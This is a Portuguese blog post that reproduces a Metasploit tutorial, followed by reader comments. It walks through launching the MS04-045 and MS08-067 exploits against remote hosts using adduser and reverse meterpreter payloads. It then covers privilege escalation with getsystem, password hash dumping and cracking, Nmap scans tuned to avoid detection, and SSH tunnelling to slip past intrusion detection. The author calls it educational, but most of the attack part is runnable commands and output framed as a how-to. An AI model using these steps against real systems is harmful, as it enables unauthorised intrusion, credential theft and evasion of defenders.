O tutorial abaixo é uma cópia exata do site portugual-a-programar e em minhão opinião é um dos melhores para língua portuguesa. O original poderá ser acessado no seguinte link. Nenhuma palavra ou vírgula foi alterada do original, restando somente o meu apoio e parabéns quanto ao excelente trabalho feito pelo herakty , autor deste excelente tutorial.

Vale lembrar que este tutorial está em português de Portugal.

O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade

Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável pelos seus actos.
De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM´s

Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que simplifica o processo, apesar de aconselhar a usarem o cliente tipo linha de comandos (msfcl)
A interface gráfica é o msfweb – Interface gráfica via browser

Vou usar o linux mas há também a versão para windows. Então levando em consideração que tenham instalado no vosso PC e está a funcionar, vamos dar uma vista sobre a utilização desta SUPER PODEROSA FERRAMENTA… um sonho tornado realidade… para mim que ainda me lembro quando para fazer isto era preciso dezenas de tools e procedimentos… agora tá tudo integrado numa plataforma/framework.
Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para que não possa ser usado como guia total para um ataque, visto cobrir todo o percurso de exploitation. Mas basta seleccionar outros exploits para as novas coisinhas… ;)

Vejam também a, digamos,  o irmão web que é a excelente w3af “Web Application Attack  and Audit Framework.”
Apesar do metasploit também estar preparado para ataques web, mas eu especializei-me nos dois e é melhor trabalhar com as duas em conjunto.

O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês explorarem… explorem os payloads, os exploits e todos os outros utilitários. Podem fazer-lo lendo ou explorando nos ficheiros ou com comandos do tipo “show payloads” ou “show exploits”, entre outros.)

msfconsole – metasploit em modo console
msfcli – interface de automatização de penetração e exploração
msflogdump – exibe sessões de arquivos de log
msfplayload – usado para gerar payloads customizados
msfpescan – utilizado para analisar e descompilar executáveis e DLLs
msfencode – um codificador interactivo de payload encoder
msfupdate – utilizado para verificar e fazer download de actualização do framework
msfweb – Interface gráfica via browser

Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma versão gratuita do detector de vulnerabilidades automático, o NeXpose Community Edition… ele detecta as vulnerabilidades e integra-se com o metasploit.

Nexpose  (Detector de vulnerabilidades)
http://www.rapid7.com/vulnerability-scanner.jsp

Podem, como eu, usar o Nessus para isso ou outras ferramentas… hoje até o nmap têm scripts para detectar vulnerabilidades, que são a principal questão no exploitation… é a partir de uma vulnerabilidade que tudo acontece e precisam saber a versão exacta do software alvo e do SO… em alguns casos no windows até a língua em que o windows esta.
Algo essencial para se escolher o exploit certo é saber o serviço e a versão exacta do mesmo, pois os exploits são feitos nessa base. Para tal e se soubermos já que há uma vulnerabilidade para um apache 2 versão anterior à 2.15, podemos fazer um scan especifico com o Nmap a essa porta (80) para não dar nas vistas. É como se alguem tivesse a aceder ao site, pois apenas são enviados pacotes para a porta 80. Se fizerem um scan a todas as portas e houver algum equipamento de jeito no caminho vai detectar que é um scan e corta. Saibam o que procurar e não façam scans a todas as portas, a não ser que não haja qualquer equipamento especial, como acontece na maioria dos datacenters para as contas mais baixas. As mais usadas  :cheesygrin: :thumbsup:
.

Nmap –sT –P0 –A –version-all –T0 –p 80 ipalvo (o –T0 é para que haja maior espaço de tempo entre o envio de pacotes, para dificultar a detecção. Mas não é uma técnica de evasão e pode ser dispensado. O Nmap têm diversas técnicas de evasão, como spoofing, etc… explorem a documentação)

Nessus (Detector de vulnerabilidades)
http://www.nessus.org/nessus/
O Nessus é um motor que interpreta scripts em NASL (ver artigo meu na 3ª Edição – Julho de 2006 que explica melhor esta linguagem) e envia-os contra um ou mais alvos, fazendo um relatório dos resultados. Estes scripts procurar milhares de vulnerabilidades, mas apensa as conhecidas. Podem desenvolver os vossos próprios scripts NASL para coisas novas.

Voltando ao Metasploit, eu vou ensinar aqui a utilizar somente três destas ferramentas(msfconsole, msfcli, msfweb), pois acredito que um verdadeiro  :smoke: aprenderá sozinho o restante… como sempre dou a base para futuras explorações. Ajuda ao ensino e evita script kiddies

msfconsole:
Primeiramente digita-se na linha de comando :

[root]#./msfconsole
se for no windows só digite msfconsole sem ./, continuando deverá aparecer algo como: (neste caso já foi usado o comando “show exploits” para se ter uma lista dos exploits. O comando show serve para outras coisas como payloads e opções. Ver em detalhe)

Para quem dá o primeiro passo pode executar o comando “help” para ver os comandos de consola. Atenção que isto são apenas os comandos de consola e não todas as suas funcionalidades.

Como vimos na primeira imagem do mestasploit e a nivel formativo, pois no mundo a sério já saberão que exploit usar, será: show [opção]  (a opção poderá ser uma das que vos aparecerão senão digitarem nenhuma, como podem ver no exemplo em seguida

desta forma:


msf > show
msfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops'
msf >

Viram que apareceram as opções deste comando. O mesmo acontece com outros comandos, pois podem ir assim explorando a framework.

Para saberem quais os exploits que existem nesta framework (desde a ultima actualização, devem ir actualizando o metasploit que está em constante evolução) basta digitar o comando:

msf >show exploits;

Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante.

Então dentro do ambiente do metasploit escolhemos o exploit assim com o comando “use”:

msf > use wins_ms04_045
msf wins_ms04_045 >

viram que eu escolhi o wins_ms04_045 e o prompt mudou ?. Utilizando para isto o comando: use

continuando…

Digitamos o nosso velho amigo : show , novamente para verificar quais atributos ele aceita . Vejamos:

msf wins_ms04_045 > show
msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced'
msf wins_ms04_045 >

Vimos aqui que ele aceita targets, payloads, options ou advanced.

Vamos verificar quais opções que este exploit já seleccionado aceita:

msf wins_ms04_045 > show options

Exploit Options
===============

Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 42 The target port

Target: Target Not Specified

 

msf wins_ms04_045 >
Este exploit aceita somente duas opções : o ip alvo e a porta alvo. ?

Agora deves estar a perguntar… como faço para utilizar isto. Simples, basta configurar o que o exploit aceita (há diferenças entre exploits e cada vez mais, pois mais complexidade e vectores são adicionados, diferenciando cada vez mais os exploits), lembrando que onde estiver escrito required,  significa que estas opções tem que ser configuradas obrigatoriamente para o exploit funcionar. Continuando…

Façamos assim:

msf wins_ms04_045 > set RHOST 200.126.35.34
RHOST -> 200.126.35.34
msf wins_ms04_04>

msf wins_ms04_045 > set RPORT 42
RPORT -> 42
msf wins_ms04_045 >

Vejam que utilizei a mesma porta que o valor por default…
Agora teremos que seleccionar o payload para o nosso exploit. O payload nada mais é que um software acoplado ao exploit para fazer as mais variadas tarefas.
Digitamos então o comando para saber os payloads suportados pelo nosso exploit: show payloads

msf wins_ms04_045 > show payloads

Metasploit Framework Usable Payloads
====================================

win32_adduser Windows Execute net user /ADD
win32_bind Windows Bind Shell
win32_bind_dllinject Windows Bind DLL Inject
win32_bind_meterpreter Windows Bind Meterpreter DLL Inject
win32_bind_stg Windows Staged Bind Shell
win32_bind_stg_upexec Windows Staged Bind Upload/Execute
win32_bind_vncinject Windows Bind VNC Server DLL Inject
win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_ord Windows Staged Reverse Ordinal Shell
win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

 

msf wins_ms04_045 >
Eu vou escolher o primeiro payload, que faz com que seja adicionado remotamente um utilizador no sistema windows (como tenho dito tanto sobre os payloads, hoje já há payloads para tudo e todos os SO´s… até uma shell especial para cracking que é o meterpreter)  :cheesygrin: :thumbsup:

O meterpreter é um complexo payload que é uma espécia de shell especial para cracking, com funcionalidades especificas para isso. Algo que já falei bastante também.

Documento onde é detalhado técnicamente o meterpreter:
http://www.nologin.org/Downloads/Papers/meterpreter.pdf

Caso queiram usar o meterpreter, na selecção do payload, escolham um com meterpreter, como por exemplo win32_reverse_meterpreter… isto vai criar uma sessão no alvo, com o meterpreter e como é reverse passa pelas firewalls, pois estas pensam que como vem de dentro da rede é confiável.

Assim:

msf wins_ms04_045 > set PAYLOAD win32_adduser jolie
PAYLOAD win32_adduser -> jolie
msf wins_ms04_045>

Vamos agora listar os sistemas operativos que serão os alvos: Utilizando o velho comando : show, só que agora assim: show targets

msf wins_ms04_045 > show targets

Supported Exploit Targets
=========================

0 Windows 2000 English

msf wins_ms04_045 >

Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem...

 

msf wins_ms04_045 > set TARGET 0
TARGET -> 0
msf wins_ms04_045 >

tamos mesmo, mesmo, mesmo a um tirinho de caçadeira… valeu a pena chegar aqui… pois agora apenas falta uma coisa para completar nossa tarefa… Executar o nosso exploit, que é mais um pacote exploit (conjunto de várias coisas que antigamente se faziam em separado e com muito trabalho) do que somente um exploit.

Digite somente: exploit (lindo não? Isto é “disparar” o exploit em direcção ao alvo. ATENÇÃO. Só usar alvos virutais ou máquinas voças

msf wins_ms04_045 > exploit
E pronto…Acabamos a nossa primeira etapa, agora vamos passar para o msfcli.

O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agiliza
muito o nosso trabalho na linha de comando digitamos assim:

[root]#./msfcli wins_ms04_045 RHOST =200.156.23.25 RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 E
e vejam que faz a mesma coisa que no modo console.
Caso o exploit se direcione a um serviço sem previlégios especiais pode-se usar um exploit local para escalar previlégios ou os seguintes comandos do meterpreter. Atenção que neste caso terão de estar a usar o meterpreter (para isso terão na altura de selecção do payload escolher um especial com o meterpreter, como por exemplo win32_reverse_meterpreter)
E na sessão do meterpreter usem os scripts já existentes para isso, como apresento em baixo.

meterpreter> use priv
meterpreter> getsystem

Mais coisas interessantes que se podem fazer com o meterpreter em conjunto com outras ferrametas geniáis, como o LophtCrack ou o Cain e Abel para crackar hashes de passwords.
Has passwords estão codificadas mas podem ser “sacadas” e posteriormente crackadas… garanto que conseguirão algumas que não sejam muito fortes, o que é muito normal.

Por exemplo. Como fazer o dump das hashes das passowrds com o meterpreter e fazer o download para depois as crackarem com algum dos programas anteriormente mencionados.

.MSFConsole
> use windows/smb/ms08_067_netapi
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST (meu Ip)
> set RHOST (Ip Remoto)
> exploit
> getuid
> hashdump
> use -f cmd -c

Para fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo comprometido.

meterpreter> download arquivo1 arquivo2 pastaDestino
meterpreter> upload arquivo1 arquivo2 pastaDestino

Para crackar as hashes eu uso o LOphtCrack. É só guardar o resultado do “hashdump” num .txt (meuHash.txt) e usa-lo no LOphtCrack. Garanto que terão algumas passwords interessantes.

(investiguem também a familia Pwdump… muito interessante para certas situações.)

Citar

pwdump is the name of various Windows programs that output the LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM). In order to work, it must be run under an Administrator account, or be able to access an Administrator account on the computer where the hashes are to be dumped; so Pwdump does not compromise security. Most of these programs are open-source.

http://en.wikipedia.org/wiki/Pwdump (aqui são explicadas as várias “cores” e “sabores” e seus links)

Vamos passar para uma forma ainda mais fácil. Garanto que o ppl mais windows vão adorar esta forma, que é um GUI (Grafical User Interface… mas no mundo dos exploits? Sim… vejam)

Trata-se da ferramenta msfweb que quando executado permite fazermos tudo por uma pagina web, todas as funcionalidades aplicaveis estão lá.
Para acederem ao GUI do metasploit façam:

[root]#./msfweb
+----=[ Metasploit Framework Web Interface (ip:55555)

Deixar correr… Abrir em seguida o browser e digitar o url: teu ip, localhost, 127.0.0.1… Mais a porta 55555

Seria assim: http://localhost:55555

E assim verão a magia desta ferramenta. Um rico GUI onde facilmente qualquer um pode configurar uma sessão completa, sem digitar comandos em consolas. Claro que no alvo vão (ou não) usar a consola, pois é mais…

Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente seleccionando.

Para complementar e devido a essas novas IPS e IDS que detectam padrões de tráfego e podem ser actualizadas com as assinaturas dos novos exploits, aqui fica um extra dedicado às novas appliances PANDA
Com um tunnel SSH o tráfego vai encriptado e não é possível identificar o mesmo, o que vai dentro dessa sessão.
É uma das mais usadas técnicas de evasão,

Criando uma sessão meterpreter persistente sobre um túnel SSH (integrando com o metasploit)
http://secnow.wordpress.com/2010/04/01/criando-uma-sessao-meterpreter-persistente-a-partir-de-um-tunel-ssh/

Podem ver muitos videos que até já apresentei alguns, com tudo isto em “real” e muito mais… investiguem por ai, pois há magia no ar

Compartilhar:

Este post tem 17 comentários

  1. excelete post gustavo!

    mas o armitage quebra um galho e tanto hehe!

  2. Parabéns pelo post Gustavo!

    mas afinal… um exploit em si pode modificar/criar/apagar um arquivo?

  3. Qual o objetivo de se copiar(ctrl+c) um tutorial inteiro e colar(ctrl+v) no seu site? coruja de TI mesmo fica só de olho no conteúdo e depois paste…

  4. Bom tutorial..”tamos mesmo, mesmo, mesmo a um tirinho de caçadeira…” rsrs

    Roberto, eu aprendi a usar o mfs lendo seus tutoriais.

  5. Vi que é a primeira vez que vc acessou o blog.. Então, leia os outros 2304 posts e depois a gente conversa.. Veja também que já sorteei mais de 50 livros, 20 cursos e vários brindes.. Como dizem na minha terra: Entrou no ônibus e já quer sentar na janela.

  6. Nao sei qual o objetivo de um”hacker” vir ver um tutorial de metasploit e ainda reclamar….

    Voce é o cara!

  7. Gustavo,

    Parabéns pelo EXCELENTE site… Sem dúvida nenhuma é um dos melhores da Web. Visito-o sem pestanejar diariamente. Como você disse, não vale nem a pena perder tempo com essa galera que “entra no ônibus e quer sentar na janela”….!!!

    Continue escrevendo seus excelentes posts e filtrando o que tem na web e publicando para os seus seguidores – afinal, com o seu aval, é lógico que vou ler…!!!!

    Abraços!

  8. Só uma curiosidade off topic, eu fui no link original e lá os caras estão se pegando a tapa nos comentários… rsrsrs….

  9. Pô ia adorar sentar no corredor só pra aprender 10% do que essa galera aqui sabe, tô ralando muito atrás de informação e garanto que é difícil adentrar em alguns meios, quando aparece um pouco de informação devemos aproveitá-las ao máximo, pelo menos é o que faço.!!

  10. Trols, acho que é esse o nome que o pessoal designou à esses fakes. Bom, acho importante essas ações e mostra que também valorizamos o trabalho dos outros, obtendo permissão para divulga-los e atribuindo todos os créditos ao autor. Muito bom trabalho Gustavo.

  11. Eu usei metasploit de todas as maneiras possiveis e só consegui penetrar em uma maquina virtual usando xp sp2 desativando o firewall portando digo que esse metodo de invasão não presta!!!!!…esse negocio de furar firewall é cascata até mesmo sem maquina virtual não funfa tive que desativar o firewall do xp.

  12. cara… ate q em fim um tour legal, q pode-se aplicar a backtrack tbm q é tudo integrado, para nao hein…rssr vlw !

  13. olpa gustavo nao sei se voce ainda mexe com certas coisas. mais poderia me adicionar se usa um skype me add rennovado2@hotmail.com, preciso conversar com voce.

  14. Sou estudante de segurança e gostei muito deste tutorial.

Deixe uma resposta

Fechar Menu